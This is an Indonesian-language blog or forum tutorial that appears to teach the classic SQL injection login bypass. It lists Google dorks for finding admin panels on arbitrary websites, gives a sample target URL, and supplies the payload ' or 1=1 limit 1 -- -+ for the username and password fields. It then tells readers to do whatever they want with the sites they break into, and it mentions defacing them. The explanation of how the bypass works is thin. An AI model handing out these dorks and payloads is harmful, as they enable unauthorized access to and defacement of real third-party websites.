xixixhi, temu lagi kita ^^
Nue Stay here :p
kali ini Nue akan menjelaskan sesuai dengan judul Thread kali ini.
Liat dulu Tampilannya ;)
#kenalan dulu gan ama exploitnya :v
Link Start:
[#] Dork
inurl:manager intitle:Admin Panel[#] Dork
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/
[#] Langkah-langkah
1. Masukan salah satu dork diatas ke google, lalu pilih salah satu buat demo silahkan coba web ini
http://target.com/hostfriendz/int/index.php
2. Jika sudah memilih target silahkan anda coba login dengan user pass ini :
user : ' or 1=1 limit 1 -- -+
pass : ' or 1=1 limit 1 -- -+
Nah jika berhasil ya sudah deh terserah mau kalian apakan :D
Simpel ya hhee dah cukup itu aja kok :D
--- GAK AFDOL KALO BISA MEPES WEB TAPI GAK TAU CARA KERJANYA---
yang pernah nyoba exploit SQL injection Manual pasti dh paham deh,, yop SQL adalah query db yg terpasang di website :D nih baca cara kerja sql manual + ada tutornya juga loh (langsung praktek) disini
yep kalo kalian dh ngerti cara kerja sql manual , sekarang saya tinggal lanjutkan dikit mengenai method bypass login ini :D => dengan memanfaatkan eror pada sql website tersebut kita dapat login ke administrator web tersebut tanpa harus memasukan username dan password yang sudah dibuat admin. Singkatnya sih "bypass = bye bye password"
Sekian tutorial cupu dari Nue :D
semoga bermanfaat yaaaa,, jika ada kesalahan Nue minta maaf >3<
jika ada kesalahan penulisan ,, mohon minta revisinya di komentar ^^
Nuenomaru
Nuenomaru just an illusion in Cyber World
Visit and follow :
FP : TKJ Cyber Art
G+ : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM : C0018D1A2
1 comments
EmoticonEmoticon